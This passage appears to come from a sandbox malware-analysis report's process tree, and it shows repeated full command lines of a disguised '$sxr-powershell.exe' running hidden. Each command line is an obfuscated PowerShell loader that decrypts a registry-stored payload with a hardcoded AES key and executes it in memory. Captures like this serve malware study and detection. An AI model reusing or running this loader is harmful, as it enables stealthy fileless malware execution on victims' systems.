[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        Hide Artifacts: Hidden Window
        
        PID:8976
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2844).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:3656
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2844" "3176" "3084" "3180" "0" "0" "3184" "0" "0" "0" "0" "0"
        28⤵
        
        PID:1020
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8096).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:8960
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8096).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:5284
        
        C:\Windows\$sxr-powershell.exe
        
